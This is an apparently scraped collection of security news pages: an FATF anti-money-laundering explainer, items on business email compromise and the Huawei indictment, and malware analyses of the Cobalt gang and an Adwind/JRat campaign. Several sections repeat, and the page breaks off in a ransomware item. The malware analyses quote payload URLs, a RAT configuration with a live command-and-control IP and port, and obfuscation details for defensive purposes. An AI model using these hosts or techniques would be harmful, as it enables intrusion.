The Financial Action Task Force (FATF) was established in 1989. It built a list of Forty Recommendations for countries to address Money Laundering, which were first issued in 1990, and revised in 1996, 2001, 2003, and 2012.  Their latest FATF Annual Report (2017-2018) addresses Terrorist financing as well as new methods and trends and announces a research project on financing of recruitment for terrorism.  Many of these Recommendations meet our lives in the form of regulations on financial institutions and interactions between international law enforcement agencies.
"Regardless of their size and complexity, the financial activities and channels of terrorists are an essential source of intelligence.  Financial investigation can identify terrorist cells, their associates and facilitators, and reveal the structure of terrorist groups, and their logistics and facilitation networks." -- FATF President Santiago Otamendi, 14DEC2017, NYC.
FATF also released an important report "Financing of Recruitment for Terrorist Purposes" in January 2018, and a second report "Concealment of Beneficial Ownership" in July 2018.
Beneficial Ownership (July 2018)
Terrorist Recruitment (January 2018)
FATF is composed of 38 member states, covering most of the major financial centers of the world. Each of these member states has pledged to come into compliance with the Forty Recommendations, and to measure its progress.

The FATF Forty Recommendations on Money Laundering and Counter Terrorism Finance

International Standards on Combating Money Launderingand the Financing of Terrorism& Proliferation (Oct 2018)
The Recommendations fall into seven major categories:

A - AML/CFT Policies and Coordination
  • R1. Asessing risks & applying a risk-based approach
  • R2. National cooperation and coordination


B - Money Laundering and Confiscation

  • R3. Money laundering offense 
  • R4. Confiscation and provisional measures


C - Terrorist Financing and Financing of Proliferation

  • R5. Terrorist financing offense
  • R6. Targeted financial sanctions related to terrorism and terrorist financing
  • R7. Targeted financial sanctions related to proliferation 
  • R8. Non-profit organizations


D - Preventative Measures

  • R9. Financial institution secrecy laws
  • R10. Customer due diligence 
  • R11. Record keeping 
  • R12. Politically exposed persons
  • R13. Correspondent banking
  • R14. Money or Value transfer services
  • R15. New technologies
  • R16. Wire transfers 
  • R17. Reliance on third parties 
  • R18. Internal controls and foreign branches and subsidiaries
  • R19. Higher-risk countries
  • R20. Reporting of suspicious transactions
  • R21. Tipping-off and confidentiality 
  • R22. Designated non-Financial Businesses and Professions: Customer due diligence
  • R23. Designated non-Financial Businesses and Professions: Other measures 


E - Transparency and Beneficial Ownership of Legal Persons and Arrangements

  • R24. Transparency and beneficial ownership of legal persons
  • R25. Transparency and beneficial ownership of legal arrangements 


F - Powers and Responsibilities of Competent Authorities and Other Institutional Measures

  • R26. Regulation and supervision of financial institutions
  • R27. Powers of supervisors
  • R28. Regulation and supervision of Designated non-Financial Businesses and Professions
  • R29. Financial intelligence units
  • R30. Responsibilities of law enforcement and investigative authorities 
  • R31. Powers of law enforcement and investigative authorities 
  • R32. Cash couriers 
  • R33. Statistics
  • R34. Guidance and feedback 
  • R35. Sanctions 


G - International Cooperation

  • R36. International instruments 
  • R37. Mutual legal assistance 
  • R38. Mutual legal assistance: freezing and confiscation
  • R39. Extradition 
  • R40. Other forms of international cooperation 


Mutual Evalution and Ranking of Members  

4th Round Ratings
In this chart, each member state, including the Associate members, is ranked on how well they comply with each of the 11 "Immediate Outcomes" and 40 Recommendations.  For example, the United States is currently not compliant with recommendations 22, 23, and 24 -- so, we don't do well in non-financial institutions, and our shell company games are impossible to monitor as of now, but we do generally do well in most others.  Clicking the "4th Round Ratings" label will take you to the full chart.  If you do international business, it may be a form of risk doing businesses in countries with poor ratings across the board here.

FATF Associate Members

FATF also has 9 Regional Bodies, considered "FATF Associate Members" each of which put out specialized information for their portion of the world.  For those who are interested in that Region, following up on those specific regions reports from their representative task forces and groups will be worthwhile.

A Special Focus on Terrorist Financing Risks 

FATF issued their first special report offering guidance on Terrorist Financing in 2008:


Several more recent reports would be especially interesting regarding terrorist financing, stemming from an emergency meeting of 55 states, the United Nations, the Egmont Group of Financial Intelligence Units, the International Monetary Fund, the World Bank, and others specifically to address curbing the financing of ISIS/ISIL.



In the Paris meeting of 19OCT2018, FATF encouraged members to expand their focus from looking specifically at ISIL to more broadly include Al Qaeda and its Affiliates, issuing this guidance:



Regional Terrorist Financing Focuses

There have also been significant regional reports issued by sub-groups and associate members.

The Counter-Terrorism Financing Summit, hosted by Australia's Financial Intelligence Agency (AUSTRAC) and the Indonesian counterpart, Pusat Pelaporan dan Analisis Transaksi Keuangan (PPATK), issued the Regional Risk Assessment on Terrorism Financing 2016.  The following year, the event was repeated, adding Bank Negara Malaysia as a partner.  These events issued two small statements, and one more substantial report, addressing events in Philippines, Thailand, Malaysia, Singapore, Indonesia, and Australia, and how those events were funded.

A risk methodology for their region (p.22)

The Nusa Dua Statement - August 2016 
Kuala Lumpur Communique - November 2017 


West and Central Africa have very different concerns, and held a summit to discuss these differences, resulting in this excellent joint publication: 

"Terrorist Financing in West and Central Africa", October 2016
50 page joint report from FATF, GIABA, and GABAC


Particular Funding Methods for Terrorism Finance

Many other special reports have been issued, related to the trade in:

Virtual Currencies of Growing Concern

In the Paris meeting 19OCT2018, a special issue that was raised was the Regulation of Virtual Currencies.  This was deemed to be a matter of strategic interest that will be further evaluated, especially with regard to Initial Coin Offerings and their role in Money Laundering.  FATF has committed to work with the G20 to come up with new guidelines to update their previous report "Virtual Currencies: Key Definitions and Potential AML/CFT Risks" as well as their report "Guidance for a Risk-based Approach to Virtual Currencies" (June 2015 - 46 page PDF).  

The work so far is in the form of a report to the G20, which addresses many topics in addition to Virutal Currencies:


In part the report shares:

"Noting that virtual currencies/crypto-assets raise issues with respect to money laundering and terrorist financing, they committed to implement the FATF Standards as they apply to virtual currencies/crypto-assets.  They looked forward to the FATF review of those Standards, called on the FATF to advance global implementation, and asked the FATF to provide an update on this work in July 2018.  The FATF will take this work forward under the US presidency from 1 July 2018 to 30 June 2019."

This work begins with first reviewing laws and regulations regarding crypto-assets and virtual currencies in each of the G20 states.

More on this topic will certainly be forth-coming from FATF.






CyberCrime & Doing Time

Money Laundering and Counter-Terrorist Financing: What is FATF?

Many cybercrime investigators seem narrowly focused on the bits and bytes of the crimes they investigate while not truly understanding or interacting with those who focus on where the money goes.  As we've been expanding our horizons, I've learned quite a bit and wanted to share some resources for others who may have been similarly limited in their focus.

The Financial Action Task Force (FATF) was established in 1989. It built a list of Forty Recommendations for countries to address Money Laundering, which were first issued in 1990, and revised in 1996, 2001, 2003, and 2012.  Their latest FATF Annual Report (2017-2018) addresses Terrorist financing as well as new methods and trends and announces a research project on financing of recruitment for terrorism.  Many of these Recommendations meet our lives in the form of regulations on financial institutions and interactions between international law enforcement agencies.
"Regardless of their size and complexity, the financial activities and channels of terrorists are an essential source of intelligence.  Financial investigation can identify terrorist cells, their associates and facilitators, and reveal the structure of terrorist groups, and their logistics and facilitation networks." -- FATF President Santiago Otamendi, 14DEC2017, NYC.
FATF also released an important report "Financing of Recruitment for Terrorist Purposes" in January 2018, and a second report "Concealment of Beneficial Ownership" in July 2018.
Beneficial Ownership (July 2018)
Terrorist Recruitment (January 2018)
FATF is composed of 38 member states, covering most of the major financial centers of the world. Each of these member states has pledged to come into compliance with the Forty Recommendations, and to measure its progress.

The FATF Forty Recommendations on Money Laundering and Counter Terrorism Finance

International Standards on Combating Money Launderingand the Financing of Terrorism& Proliferation (Oct 2018)
The Recommendations fall into seven major categories:

A - AML/CFT Policies and Coordination
  • R1. Asessing risks & applying a risk-based approach
  • R2. National cooperation and coordination


B - Money Laundering and Confiscation

  • R3. Money laundering offense 
  • R4. Confiscation and provisional measures


C - Terrorist Financing and Financing of Proliferation

  • R5. Terrorist financing offense
  • R6. Targeted financial sanctions related to terrorism and terrorist financing
  • R7. Targeted financial sanctions related to proliferation 
  • R8. Non-profit organizations


D - Preventative Measures

  • R9. Financial institution secrecy laws
  • R10. Customer due diligence 
  • R11. Record keeping 
  • R12. Politically exposed persons
  • R13. Correspondent banking
  • R14. Money or Value transfer services
  • R15. New technologies
  • R16. Wire transfers 
  • R17. Reliance on third parties 
  • R18. Internal controls and foreign branches and subsidiaries
  • R19. Higher-risk countries
  • R20. Reporting of suspicious transactions
  • R21. Tipping-off and confidentiality 
  • R22. Designated non-Financial Businesses and Professions: Customer due diligence
  • R23. Designated non-Financial Businesses and Professions: Other measures 


E - Transparency and Beneficial Ownership of Legal Persons and Arrangements

  • R24. Transparency and beneficial ownership of legal persons
  • R25. Transparency and beneficial ownership of legal arrangements 


F - Powers and Responsibilities of Competent Authorities and Other Institutional Measures

  • R26. Regulation and supervision of financial institutions
  • R27. Powers of supervisors
  • R28. Regulation and supervision of Designated non-Financial Businesses and Professions
  • R29. Financial intelligence units
  • R30. Responsibilities of law enforcement and investigative authorities 
  • R31. Powers of law enforcement and investigative authorities 
  • R32. Cash couriers 
  • R33. Statistics
  • R34. Guidance and feedback 
  • R35. Sanctions 


G - International Cooperation

  • R36. International instruments 
  • R37. Mutual legal assistance 
  • R38. Mutual legal assistance: freezing and confiscation
  • R39. Extradition 
  • R40. Other forms of international cooperation 


Mutual Evalution and Ranking of Members  

4th Round Ratings
In this chart, each member state, including the Associate members, is ranked on how well they comply with each of the 11 "Immediate Outcomes" and 40 Recommendations.  For example, the United States is currently not compliant with recommendations 22, 23, and 24 -- so, we don't do well in non-financial institutions, and our shell company games are impossible to monitor as of now, but we do generally do well in most others.  Clicking the "4th Round Ratings" label will take you to the full chart.  If you do international business, it may be a form of risk doing businesses in countries with poor ratings across the board here.

FATF Member Assessments

Each member is encouraged to perform regular assessments to measure themselves on how they are complying with the Forty Recommendations.  Here are example reports from the United States, but these reports are available for every country that participates in FATF or one of the Associate Members.  In the United States, these assessments are published by the Department of the Treasury.  These reports were issued in 2015 by the Treasury Undersecretary for Terrorism and Financial Intelligence, Adam Szubin.

2015 Money Laundering Risk Assessment

2015 Terrorist Financing Risk Assessment

The goal of sharing these examples is to serve as a reminder that from the FATF site, ALL such reports for all member states are available, by looking for the "Mutual Evalutions Publications." As of this writing the four newest ones are from Tunisia, Nicaragua, Panama, and Tajikistan.

FATF Associate Members

FATF also has 9 Regional Bodies, considered "FATF Associate Members" each of which put out specialized information for their portion of the world.  For those who are interested in that Region, following up on those specific regions reports from their representative task forces and groups will be worthwhile.

A Special Focus on Terrorist Financing Risks 

FATF issued their first special report offering guidance on Terrorist Financing in 2008:


Several more recent reports would be especially interesting regarding terrorist financing, stemming from an emergency meeting of 55 states, the United Nations, the Egmont Group of Financial Intelligence Units, the International Monetary Fund, the World Bank, and others specifically to address curbing the financing of ISIS/ISIL.



In the Paris meeting of 19OCT2018, FATF encouraged members to expand their focus from looking specifically at ISIL to more broadly include Al Qaeda and its Affiliates, issuing this guidance:



Regional Terrorist Financing Focuses

There have also been significant regional reports issued by sub-groups and associate members.

The Counter-Terrorism Financing Summit, hosted by Australia's Financial Intelligence Agency (AUSTRAC) and the Indonesian counterpart, Pusat Pelaporan dan Analisis Transaksi Keuangan (PPATK), issued the Regional Risk Assessment on Terrorism Financing 2016.  The following year, the event was repeated, adding Bank Negara Malaysia as a partner.  These events issued two small statements, and one more substantial report, addressing events in Philippines, Thailand, Malaysia, Singapore, Indonesia, and Australia, and how those events were funded.

A risk methodology for their region (p.22)

The Nusa Dua Statement - August 2016 
Kuala Lumpur Communique - November 2017 


West and Central Africa have very different concerns, and held a summit to discuss these differences, resulting in this excellent joint publication: 

"Terrorist Financing in West and Central Africa", October 2016
50 page joint report from FATF, GIABA, and GABAC


Particular Funding Methods for Terrorism Finance

Many other special reports have been issued, related to the trade in:

Virtual Currencies of Growing Concern

In the Paris meeting 19OCT2018, a special issue that was raised was the Regulation of Virtual Currencies.  This was deemed to be a matter of strategic interest that will be further evaluated, especially with regard to Initial Coin Offerings and their role in Money Laundering.  FATF has committed to work with the G20 to come up with new guidelines to update their previous report "Virtual Currencies: Key Definitions and Potential AML/CFT Risks" as well as their report "Guidance for a Risk-based Approach to Virtual Currencies" (June 2015 - 46 page PDF).  

The work so far is in the form of a report to the G20, which addresses many topics in addition to Virutal Currencies:


In part the report shares:

"Noting that virtual currencies/crypto-assets raise issues with respect to money laundering and terrorist financing, they committed to implement the FATF Standards as they apply to virtual currencies/crypto-assets.  They looked forward to the FATF review of those Standards, called on the FATF to advance global implementation, and asked the FATF to provide an update on this work in July 2018.  The FATF will take this work forward under the US presidency from 1 July 2018 to 30 June 2019."

This work begins with first reviewing laws and regulations regarding crypto-assets and virtual currencies in each of the G20 states.

More on this topic will certainly be forth-coming from FATF.




DoJ Charges Huawei Execs in Broad Indictment Spanning 10 Years of Criminal Activity

The Department of Justice (DoJ) filed broad charges against Chinese telecom giant Huawei Technologies Co. Ltd. and its CFO Wanzhou Meng for allegedly stealing trade secrets from U.S. mobile firm T-Mobile and deceiving U.S. stakeholders about its business activity in Iran, among a number of other fraud and conspiracy activities over a 10-year...

Read the whole entry... »

Related Stories

Police Shut Down xDedic – An Online Market for Cyber Criminals

In an international operation involving law enforcement authorities from the U.S. and several European countries, feds have shut down an online underground marketplace and arrested three suspects in Ukraine. Dubbed xDedic, the illegal online marketplace let cybercriminals buy, sell or rent out access to thousands of hacked computers and servers across the world and personally identifiable

Why You Should Be Worried About London Blue’s Business Email Compromise Attacks

Phishing is nothing new, and efforts to train employees on how to detect and thwart phishing attacks should always be an essential component of any security awareness training program. But what happens when phishing attacks specifically target chief financial officers (CFOs)?

Researchers have discovered increasing evidence of a threat group named London Blue, a U.K.-based collective that focuses on CFOs at mortgage companies, accounting firms and some of the world’s largest banks. According to a report passed on to authorities by Agari, London Blue has collected email addresses for more than 50,000 senior-level targets in the U.S. and other countries, of which 71 percent hold a CFO title. The Agari report noted that London Blue operators have been utilizing email display name deception to trick senior employees into making fraudulent payments to the threat group’s accounts.

The ABCs of BEC

This type of attack, classified as business email compromise (BEC), builds on the typical phishing attack by taking the social engineering aspect to the next level — and sometimes includes elaborate hacking into email servers and the takeover of executive email accounts. But perhaps the most concerning feature of London Blue is that it is an organized cybercrime gang (OCCG) and, as such, works as efficiently as any modern corporation, with specific departments for lead generation, financial operations and human resources.

Crane Hassold, Agari’s senior director of threat research, explained that the report came about when London Blue targeted the company’s CFO for a potential BEC attack.

“Once that came in we started doing a little more digging, and there was a lot of active engagement with the scammers to understand more about them,” he said. It took Agari about four months of engagement after first observing the threat group to release the report.

BEC is a hot topic because it has been relatively successful. What’s really interesting to Hassold and his team is that the attack doesn’t require any technical means to get a result.

“When we think of cyberattacks, we think of things like malware-based attacks where there’s something technical that happened, but in this case, it’s pure social engineering,” said Hassold. Given his background with the Federal Bureau of Investigation (FBI)’s Behavioral Analysis Unit, Hassold is keenly aware that social engineering is the conduit to many cyberattacks.

“A lot of work has to go into them in order to make them successful, but the reasons we’re seeing these being used more commonly is that they’re relatively easy to do with no technical knowledge needed to send one of these things out,” he said. Even if these attacks have a success rate of less than 1 percent, Hassold noted, threat actors can still net tens of thousands of dollars a month.

The Simple, Yet Successful Tactics of London Blue

On a positive note, despite being so organized, groups like London Blue are still using old-school tactics such as the “Nigerian prince” scam, in which poor grammar and spelling are prominent. Red flags should be easy to spot. Yet, somehow, these scams still work on a very limited scale.

“They’re still around because they are successful enough,” said Hassold. “Even though most people would look at one of those things and ask ‘how could anyone actually fall for this?’, there’s always going to be a tiny population of people that will fall for it. They prey on central components of the human brain, like trust, fear and anxiety.” Those components are usually on overdrive when an employee gets an email he or she believes is coming from a CEO or CFO.

Not only have London Blue’s tactics remained the same over the last few years, but its BEC attack isn’t all that complicated. According to Agari’s report, the threat group uses a throwaway email address and changes the display name to match the CEO or CFO of a company. Attackers then send an email to the target financial executive — from their collection of email addresses — asking them to initiate a money transfer for some made-up reason. If London Blue gets a response from the victim, it replies with one or two bank accounts that they control for the money transfer.

Go Back to Security Basics

There’s no reason to believe that the rise in senior-level phishing attacks is going to stop anytime soon. So what are the best tactics to prevent this type of attack?

The easiest solution, of course, is to avoid clicking on links or attachments that appear suspicious. Even if an email seems to be legitimately coming from someone you know, it’s best to think twice before clicking or replying.

“We’ve been accustomed to just simply reacting or responding to emails,” said Hassold. “That’s how we do business, but I think part of what we need to do is take a second to stop and think about what we’re looking at before we take any action.”

Like anything related to security, doing your due diligence is a must, even for day-to-day emailing. While security awareness training for the C-suite is never a bad idea, in the case of a BEC attack, it may not be immediately helpful. Because these attacks have such a low overall success rate, you’d need a perfect 0 percent click rate in security awareness simulations to completely prevent them. Additionally, in Hassold’s experience, CEOs and CFOs are generally less receptive to security awareness training.

“They are extremely busy doing a lot of other different types of activities, so sitting down and having them learn about what the threats are to the business is difficult,” he explained.

CSOs and CISOs: Brush Up on Your Marketing Skills

Instead of awareness training, your chief security officer (CSO) or chief information security officer (CISO)’s time may be better spent making sure other executives understand cyber risks in a way that resonates with them — for example, by showing financial executives real-world incidents that have cost companies millions of dollars. No executive wants his or her company to be the next Maersk; the container shipping conglomerate lost up to $300 million and had to reinstall 45,000 PCs and 4,000 servers after being hit by NotPetya ransomware in 2017, according to ZDNet.

I recall having a long conversation about security awareness with the CSO of a large beverage company, who told me that when it comes to convincing other executives of the importance of security, you need to act like the marketing department and sell them on the concept. This CSO often has her team create pitch decks full of real-world examples to underscore the importance of proper security hygiene. This tactic can work wonders when executed effectively.

Don’t Underestimate the Threat of Business Email Compromise

For Hassold, the biggest takeaway from Agari’s report is how groups like London Blue acquire their information.

“These groups are using legitimate services used by sales teams all over the world to curate their targets,” he said.

Using popular sales prospecting tools, threat groups can narrow targets by granular demographics and export them into a nice CSV file. The report concluded that “the pure scale of the group’s target repository is evidence that BEC attacks are a threat to all businesses, regardless of size or location.” Agari also predicted that the use of legitimate services for malicious means will increase in the future.

Business email compromise attacks are clearly a major threat for IT and security leaders to keep an eye on as attackers continue upping their game and making their emails look more legitimate. A strong security culture, combined with a back-to-the-basics approach to security training, can help enterprises avoid being on the receiving end of a successful attack.

The post Why You Should Be Worried About London Blue’s Business Email Compromise Attacks appeared first on Security Intelligence.

Security Affairs: Cobalt cybercrime gang abused Google App Engine in recent attacks

The Cobalt cybercrime gang has been using Google App Engine to distribute malware through PDF decoy documents.

The Cobalt hacking group has been using Google App Engine to distribute malware through PDF decoy documents. The group targeted more than 20 other government and financial institutions worldwide. 

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

In August, security experts from Netscout’s ASERT uncovered a campaign carried out by the group that targeted the NS Bank in Russia and Carpatica/Patria in Romania.

Recently that hacking crew leveraged URL redirection in PDF decoy documents to deliver malicious payloads to the victims. Threat actors used HTTPS URLs to point to Google App Engine, with this technique attackers attempt to trick the victim into believing they are accessing a resource from Google.

cobalt

Attackers used specially crafted PDF documents created with the
Adobe Acrobat 18.0 that contained the malicious URLs in a compressed form.

“Most of the PDF’s we observed were created using Adobe Acrobat 18.0. They contained the malicious URL in a compressed form in the PDF stream using Flat Decode (Filter/FlateDecode).” reads the analysis published by Netskope.

“Similarly, all the decoys used HTTPS URLs for delivering the payload.”

This specific URL redirection case is classified as Unvalidated Redirects and Forwards as per the Open Web Application Security Project (OWASP).

“Once the URL is accessed, the user is logged out from appengine.google.com and a response status code ‘302’ is generated for URL redirection. As this action gets executed, the user is in turn redirected to google.com/url using the query “?continue=”.  Using this redirection logic, the destination landing page is reached,” continues the analysis. 

PDF readers prompt a security warning when the document connects to a website, but once “remember this action for this site” is checked for a domain, this warning will not be displayed. The possible scenarios are two:

  • the prompt refers the appengine.google.com, but victims will likely allow it to reach the website. 
  • the appengine.google.com is whitelisted by administrators for legitimate reasons, the prompt will not be displayed.. 

Cobalt crime group used PDFs that downloaded a Microsoft Word document with obfuscated macro code. Once the victims will enable the macro another stage payload is downloaded. 

“On enabling the option, the macro gets executed and downloads another stage payload from transef[.]biz/fr.txt. The stage payloads are often used by threat actors to ensure a smoother transition and to make an attack harder to detect, investigate and mitigate” continues the analysis.

“fr.txt is detonated using Microsoft Connection Manager Profile Installer (csmtp.exe) from the location, %Appdata%\Roaming\Microsoft\26117.txt as an INF file”

The attack technique resembles the Squiblydoo method wherein malicious scriptlets are loaded using native Windows applications, it allows to bypass application whitelisting solutions like Windows Applocker.

At the time of analysis, the next stage payload “fr.txt” was down and not serving any payload. Though the payload was down, we leveraged our Netskope Threat Intelligence to attribute these attacks to an infamous threat actor group named ‘Cobalt Strike’, ” concludes the analysis.

Pierluigi Paganini

(SecurityAffairs – Cobalt, Google App Engine)


The post Cobalt cybercrime gang abused Google App Engine in recent attacks appeared first on Security Affairs.



Security Affairs

Cobalt cybercrime gang abused Google App Engine in recent attacks

The Cobalt cybercrime gang has been using Google App Engine to distribute malware through PDF decoy documents.

The Cobalt hacking group has been using Google App Engine to distribute malware through PDF decoy documents. The group targeted more than 20 other government and financial institutions worldwide. 

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

In August, security experts from Netscout’s ASERT uncovered a campaign carried out by the group that targeted the NS Bank in Russia and Carpatica/Patria in Romania.

Recently that hacking crew leveraged URL redirection in PDF decoy documents to deliver malicious payloads to the victims. Threat actors used HTTPS URLs to point to Google App Engine, with this technique attackers attempt to trick the victim into believing they are accessing a resource from Google.

cobalt

Attackers used specially crafted PDF documents created with the
Adobe Acrobat 18.0 that contained the malicious URLs in a compressed form.

“Most of the PDF’s we observed were created using Adobe Acrobat 18.0. They contained the malicious URL in a compressed form in the PDF stream using Flat Decode (Filter/FlateDecode).” reads the analysis published by Netskope.

“Similarly, all the decoys used HTTPS URLs for delivering the payload.”

This specific URL redirection case is classified as Unvalidated Redirects and Forwards as per the Open Web Application Security Project (OWASP).

“Once the URL is accessed, the user is logged out from appengine.google.com and a response status code ‘302’ is generated for URL redirection. As this action gets executed, the user is in turn redirected to google.com/url using the query “?continue=”.  Using this redirection logic, the destination landing page is reached,” continues the analysis. 

PDF readers prompt a security warning when the document connects to a website, but once “remember this action for this site” is checked for a domain, this warning will not be displayed. The possible scenarios are two:

  • the prompt refers the appengine.google.com, but victims will likely allow it to reach the website. 
  • the appengine.google.com is whitelisted by administrators for legitimate reasons, the prompt will not be displayed.. 

Cobalt crime group used PDFs that downloaded a Microsoft Word document with obfuscated macro code. Once the victims will enable the macro another stage payload is downloaded. 

“On enabling the option, the macro gets executed and downloads another stage payload from transef[.]biz/fr.txt. The stage payloads are often used by threat actors to ensure a smoother transition and to make an attack harder to detect, investigate and mitigate” continues the analysis.

“fr.txt is detonated using Microsoft Connection Manager Profile Installer (csmtp.exe) from the location, %Appdata%\Roaming\Microsoft\26117.txt as an INF file”

The attack technique resembles the Squiblydoo method wherein malicious scriptlets are loaded using native Windows applications, it allows to bypass application whitelisting solutions like Windows Applocker.

At the time of analysis, the next stage payload “fr.txt” was down and not serving any payload. Though the payload was down, we leveraged our Netskope Threat Intelligence to attribute these attacks to an infamous threat actor group named ‘Cobalt Strike’, ” concludes the analysis.

Pierluigi Paganini

(SecurityAffairs – Cobalt, Google App Engine)


The post Cobalt cybercrime gang abused Google App Engine in recent attacks appeared first on Security Affairs.

The Story of Manuel’s Java RAT.

Security experts from Cybaze-Yoroi ZLab investigated two malicious spam campaigns delivering Java RAT that show some similarities.

Introduction

During the last weeks, the Cybaze-Yoroi ZLab researchers identified infection attempts aimed to install RAT malware directed to the naval industry sector. The malicious email messages contained a particular Adwind/JRat variant delivered via several methods tailored to lure the target company. 

In the recent past, similar attack cases hit this industry, such as the MartyMCFly case, where the attackers weaponized their emails with QasarRAT payloads. Instead, in this case, Cybaze-Yoroi ZLab detected the usage of multiplatform Java malware.

Technical analysis

A preliminary analysis of the two malicious email waves shows no common strict indicators: the smtp infrastructure detected on the 16th and 17th is different from the 21tst one, the attachment type didn’t match, in fact, the first ones contained .jar attachments, the second ones ZIP archives and JS scripts, and the email theme was different too.

In detail, the first email wave has been prepared to simulate a purchase order, trying to impersonate administrative personnel of an italian company operating in the Hydraulic and Lifting sectors,  “Difast Srl”. These messages were written in Italian.

The second email wave, instead, was not Italian speaking anymore. This time the attacker were trying to impersonate a German logistic company, “Dederich Spedition”, simulating another kind of purchase order communication.

However, we figured out these two email waves were linked to the same attacker.

Dissecting the Stage1

The following attachments have been analyzed by Cybaze-Yoroi Zlab team:

HashSha 256:a17b18ba1d405569d3334f4d7c653bf784f07805133d7a1e2409c69c67a72d99
ThreatJAR/Dropper
ssdeep12288:1zdaHanWmyPL64RrYzX/6ZjHfTMmy7KUBjycRKXsfp330VPMsCXtZcLzSU:1zUHanW3DJRr0/ubfTK3hycjfx30VPMw
HashSha256:cb5389744825a8a8d97c0dce8eec977ae6d8eeca456076d294c142d81de94427
ThreatJAR/Dropper
ssdeep12288:LR9aQ+oSsyJZVqhoae1yjocYKLCpOo5q/mOmFgnxhQZMR:C4yuoCoflp1DFOxx
HashSha256:5b7192be8956a0a6972cd493349fe2c58bc64529aa1f62b9f0e2eaebe65829be
ThreatJS/Dropper
ssdeep12288:Vhz+1VYSCR8TedejbWcGrwmzt7cOk6O6vJX9SxmN6QjH9HJW93awECdf66bC8a:rzbsedejF1k1BXFRVJjXl

The first two malware samples were attached to the suspicious emails sent since 16th January. The last was embedded into the 21st January emails. 

Analyzing in detail the first two JAR archives, it’s possible to see the source code is the same, except for name of the declared classes. Thus, the analysis are conducted only on one of them. 

Figure 2 – Comparison between two jar file dropper

Differently from other ones, the JS file has a different structure how visible in the following figure.

Figure 3 – Code snippet of js file dropper

Despite the different structures of code and programming languages, all the dropper samples have the same encoded payload strings.

The string labeled with the variable name “duvet” hides another layer of code. The obfuscation method is quite easy: just replace the “#@>” character with “m”, and convert all from base64. The results of decryption is visible in the following figure:

Table 4 – First step decryption of base64 encoded string

In the previous code snippet, a malware routine checks the existence of the Java environment on the victim machine: if it is not installed it downloads the JRE environment from an external location, a potentially compromised third party website  “hxxp://www[.thegoldfingerinc[.]com/images/jre.zip”.

Figure 5 – Open directory used by malware to download jre.zip component

After downloading the JRE archive, the malware installs it on the victim machine. At this point, the malware triggers the persistence mechanism and sets the typical “CurrentVersion\Run” registry key.

Figure 7  – Register key setted by the malware

After many deobfuscation rounds of the nested base64 strings recovered, the final results is:

Figure 8 – result of decrypted code

The “longText” variable hides the final payload: another .jar file. Instead, decoding the variable “longText1”, we retrieved the following code snippet:

Figure 9 – fake listener on localhost setted by the malware in case of evasion

This code, able to create a localhost listener or a sort of proxy on port 7755, is actually unused by the other part of the RAT malware.

Converging to the Java RAT Payload

As anticipated before, the “longText” variable encodes a JAR executable containing the infamous, multi-platform (Win/macOS), Adwind/JRat malware: a Remote Access Tool well known to the InfoSec community.

HashSha256:9b2968eaeb219390a81215fc79cb78a5ccf0b41db13b3e416af619ed5982eb4a
ThreatAdwind/JRAT
ssdeep12288:jz8uQYmMzFIXJ9A2G5px
ogQNUhIK/0c2qnAv:EuQ/ImYnsS7B2qnk

The structure of the code seen in the above figure, indicates the fact that it is the canonical Adwind/JRat malware, containing the “JRat.io” false flag.

Figure 10 – Structure of JRat malware

Finally, we extrapolated the configuration of the RAT payload, the JSON object reported in the following snippet.

  1. {
  2. “NETWORK”:[
  3. {
  4. “PORT”:9888,
  5. “DNS”:”185.244.30.93″
  6. }
  7. ],
  8. “INSTALL”:true,
  9. “MODULE_PATH”:”KXA/Gzd/Sb.Po”,
  10. “PLUGIN_FOLDER”:”vuVCbHOEGdl”,
  11. “JRE_FOLDER”:”bvDMbv”,
  12. “JAR_FOLDER”:”oJYFGyiYDKG”,
  13. “JAR_EXTENSION”:”gHPrve”,
  14. “ENCRYPT_KEY”:”PqKOsNWuSwYdlCTuCJPnAGXoL”,
  15. “DELAY_INSTALL”:2,
  16. “NICKNAME”:”MANUEL1986″,
  17. “VMWARE”:false,
  18. “PLUGIN_EXTENSION”:”xSgaW”,
  19. “WEBSITE_PROJECT”:”https://jrat.io”,
  20. “JAR_NAME”:”GErbOAiLUBf”,
  21. “JAR_REGISTRY”:”NVxqGXNfpjm”,
  22. “DELAY_CONNECT”:2,
  23. “VBOX”:false
  24. }

The remote destination address 185.244.30.93, belonging to “Stajazk VPN” services,  hosts the control server reachable on port tcp/9888. Also, the configuration reveal the  nickname field containing the string “MANUEL1986”. 

The usage of the VPN service hides the real location of the attacker, however, the specific IP isn’t new to the threat intel community, it has been abused since october 2018. Particularly interesting is the presence of the No-IP domain “manuel.hopto.org”: this domain also resolved Nigerian IP addresses of the 37076-EMTS-NIGERIA-AS, and and the Italian AS1267 back in 2012-2014.

Figure 11 – “manuel.hopto.org” last DNSs of C2 of JRat

Conclusions

The analyzed case shows how threat actors may quickly vary attack techniques and artifact characteristics, trying to masquerade their intent by making harder to track their attempts. Proving the investigation capabilities of a threat research team are fundamental into a modern cyber security paradigm.

The specific attack waves are not likely related to the MartyMcFly campaign discovered a few months.

Further details, including IoCs and Yara Rules, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Java RAT, malware)

The post The Story of Manuel’s Java RAT. appeared first on Security Affairs.

Sly criminals package ransomware with malicious ransom note

Ransomware continues to show signs of evolution. From a simple screen locker to a highly-sophisticated data locker, ransomware has now become a mainstream name, even if (historically), it has been around far longer than we want to look back.

Although the criminals behind ransomware campaigns are observed to be refining their approaches—from the “spray and pray” tactic to something akin to wide beam laser precision—they are also fine-tuning their targets. They can single out organizations, companies, and industries; and they can also hold cities and towns for ransom.

Ransomware has also stepped up in sophistication. Criminals have begun introducing certain forms of hybridization in their attacks, either the ransomware file itself is given capabilities outside of its type (e.g., VirRansom and Zcrypt variants that can infect files) or the entire campaign involves one or more threat vectors.

The latest in-the-wild ransomware strain discovered by a group of security researchers known as MalwareHunterTeam (MHT, for short) fits the latter.

Ransomware + phishing: a match made in heaven?

Nothing much is known about this ransomware—which some are already dubbing as CryTekk—apart from the way it applies a wily social engineering tactic to its ransom note, potentially to ensure a near 100 percent of affected parties acting on the infection and paying the ransom. The lure? An additional payment option for affected users who want to retrieve their files but don’t have a cryptocurrency wallet.

The ransom note. (Courtesy of MalwareHunterTeam)

Transcription:

